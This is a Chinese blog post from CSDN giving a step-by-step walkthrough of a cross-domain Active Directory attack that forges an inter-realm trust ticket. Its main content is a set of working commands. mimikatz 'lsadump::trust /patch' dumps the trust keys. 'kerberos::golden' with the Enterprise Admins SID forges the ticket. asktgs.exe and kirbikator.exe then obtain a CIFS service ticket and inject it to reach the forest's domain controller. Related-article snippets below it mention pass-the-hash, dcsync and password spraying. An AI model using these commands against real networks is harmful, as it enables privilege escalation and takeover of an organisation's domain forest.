域内攻击方法

最新推荐文章于 2024-05-25 18:35:48 发布
最新推荐文章于 2024-05-25 18:35:48 发布
阅读量3.6k 收藏 1
点赞数 1
分类专栏: 内网渗透 文章标签: 系统安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuxinweii/article/details/121642613
版权

环境:

在这里插入图片描述

攻击方法:伪造信任票据

部分工具下载地址:https://github.com/myxss/asktgs_compiled

一、获取子域和父域的SID 以及域信任密钥

mimikaze中有此功能
在mimikaze输入:lsadump::trust /patch

在这里插入图片描述
指向分别为 域林和子域的SID以及双方的信任密钥

二、通过SID以及信任密钥伪造信任密钥

在mimikatz中输入:
"kerberos::golden /domain:[当前所在域] /sid:[当前域的SID] /sids:[当前域的sid-519] /rc4:[信任密钥 /user:[将权限赋予谁] /service:[需要访问的服务] /target:[目标] /ticket:[生成的文件名] " exit
在这里插入图片描述

三、利用信任票据获得目标服务的TGS

在这里插入图片描述
输入命令:asktgs.exe [生成的信任票据kirbi] CIFS/[目标域主机名].[域名称]
在这里插入图片描述

四、将TGS票据注入到内存

将TGS票据注入到内存,使得主机有访问域林的权限
kirbikator.exe lsa CIFS.[目标域的主机名].[目标域名].kirbi
在这里插入图片描述
此时即可访问域控
在这里插入图片描述

RCE11
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
配置内NAT举例
03-06
配置内NAT是实现公网访问私网资源的有效方法。通过配置内NAT,可以提高网络安全性、可扩展性和灵活性。本文详细介绍了配置内NAT的步骤和脚本,希望能够帮助读者更好地理解和实现内NAT配置。
内网渗透神器(Mimikatz)——使用教程
热门推荐
W小哥
04-16 6万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
内网攻击
m0_56937298的博客
06-23 2045
内网攻击
攻击 ----->约束&&非约束委派攻击
最新发布
huohaowen的博客
05-25 864
首先,什么是委派呢?委派是指将内用户的权限委派给服务账户,使得服务账号能够以用户的权限在内展开活动接着,什么样的对象才能被委派呢?主机账号:活动目中中的Computers组内的计算机,也被称为机器账号服务账号:内用户的一种类型,是服务器运行服务时所用的账号。那么我们去控上面看一看,顺便说一下本次实验环境后续实验环境皆在此基础上进行先来看机器账号,怎么查看内的机器有几台呢?完了喜欢eason被你发现捏然后我们去控上看,DEV和COMPUTERS这两个组。
mimikatz的使用
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-15 3万+
mimikatz的下载地址 , 提取码是 kcuh mimikatz是个好东西,它的功能很多,最重要的是能获取windows的账号及明文密码 使用方法: 1:远程连接使用 控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行 privilege::debug 提取权限 sekurlsa::logonpasswords 抓取密码 这里抓到了administrator的账号,密码是null,说明没设密码 注意: 1、 文件夹里有两个版本,一个是对应32位系统的,一个是64位系
渗透-跨攻击
就是法老
08-19 1869
很多大型企业都拥有自己的内网,一般通过林进行共享资源。根握不同职能区分的部门,从逻辑上以主和子进行划分,方便统一管理。在物理层,通常使用防火墙将各个子公司及各个部门划分为不同的区攻击者如果得到了某个子公司或者某个部门的控制器权限,但没有得到整个公司的内网全部权限,往往会想办法获取其他部门或者的权限。 》》》跨攻击方法《《《 WEB漏洞:跨获取权限 PTH/PTT:DC本地管理员密码可能相同 信任关系:....... 》》》跨攻击--信任关系《《《 信任的作用:解决多.
用户密码收集
m0_65554829的博客
11-22 61
通过mimikaze获取本地用户密码和通过rdp进行横向移动
渗透之ACL攻击.pdf
08-11
SID是全局唯一的,用于唯一标识内的安全主体。在访问控制过程中,系统通过比较访问令牌中的SID与DACL或SACL中的SID来确定权限。 5. **ACE(访问控制项)** ACE是DACL和SACL的基本组成单元,定义了特定的权限规则...
用户登录
03-13
6. 用户登录:客户端计算机收到成功验证的信号后,用户便可以访问内的资源了。 四、开发实现: 使用C#等.NET语言,我们可以利用`System.DirectoryServices`命名空间下的`DirectoryEntry`和`DirectorySearcher`类...
广告业务攻击手法剖析.pdf
09-11
【广告业务攻击手法剖析】 在当今的互联网环境中,广告业务已经成为网络安全的重要战场。这篇报告主要探讨了针对广告业务的各类攻击手法,包括恶意机器流量、黑灰产资源的利用以及广告生态中的风险控制。2018年的...
权限维持方法技术解析.pdf
10-19
Golden Ticket是一种高级攻击手段,攻击者通过伪造TGT,能够在内自由行动,无需实际的身份验证。Golden Ticket通常利用MS14-068漏洞生成,攻击者需要知道控制器的KRBTGT账户的NTHash,然后可以创建持久性的权限...
内网常见攻击
Amire0x的小乐园
11-30 1258
攻击 kerberos攻击 利用黄金票据+dcsync获取密码 先获取黄金票据 获取密码 lsadump::dcsync /user:用户 /domain:名称 成功 用户、密码枚举 工具 用户枚举 先导入 Import-Module .\DomainPasswordSpray.ps1 然后执行 Get-DomainUserList -Domain domainname -RemoveDisabled -RemovePotentialLockouts | Out-File -
网络安全——局网内网络攻击手段(MAC地址攻击、ARP攻击、DHCP攻击
永远是少年
06-24 1万+
网络安全一直是信息安全的重要内容,而局安全又往往是网络安全的一个重要组成部分。局网内有哪些攻击攻击手段呢?今天主要介绍MAC地址攻击、ARP攻击、DHCP攻击攻击的原理。要看懂本文,需要有一定的局网内交换知识、DHCP原理等的理解。 一、MAC地址攻击 1、MAC地址洪范攻击 所谓MAC地址洪范攻击,就是攻击者向局网内发送大量伪造MAC地址的数据包,意图占满局网内交换机的MAC地址转发表。由于交换机MAC地址表往往都具有一定的空间限制,当MAC地址表被占满后,就无法学习到新的MAC地址,因此,
内网安全-横向PTH&PTK&PTT哈希票据传递
xhscxj的博客
03-14 1074
PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试 PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试 案例 1-横向移动 PTH 传递-mimikatz PTH ntlm 传递 未打补丁下的工作组及连接: sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20.
渗透(三)-内渗透技术
黑白的博客
05-03 4356
相关的一般会加/domain,不加的就是本地的信息cmd的IP扫描。
《内网安全攻防:渗透测试实战指南》读书笔记(七):跨攻击分析及防御
闵行小鱼塘
04-19 2622
本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,本章是跨攻击分析及防御,对利用信任关系实现跨攻击的典型方法进行了分析,并对如何部署安全的内网生产环境给出了建议,内容非常简短
常见的网站攻击方式和防护方式
一名路过的小码农啊
09-19 1万+
第一种:DOS攻击  攻击描述: 通过协议方式,或抓住系统漏洞,集中对目标进行网络攻击,让目标计算机或网络无法提供正常的服务或资源访问,使目标系统服务系统停止响应甚至崩溃。例如疯狂Ping攻击,泪滴。 危害说明: 服务器资源耗尽,停止响应;技术门槛较低,效果明显。 处理方法: 1.扩展访问列表是防止DOS攻击的有效工具,例如Show IP access-list
Windows攻击技术
weixin_33681778的博客
11-12 124
有关windows攻击的一些技术资料。 附件:http://down.51cto.com/data/2353804 本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/195611 ...
第2章 内网信息的收集(中)1
08-04
第 2 章 内网信息的收集表 2-7 邮件服务端口端 口 号端口说明使用说明25SMTP 邮件服务邮件伪造110爆破、嗅探143爆破表 2-8 网络常见协议端口

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值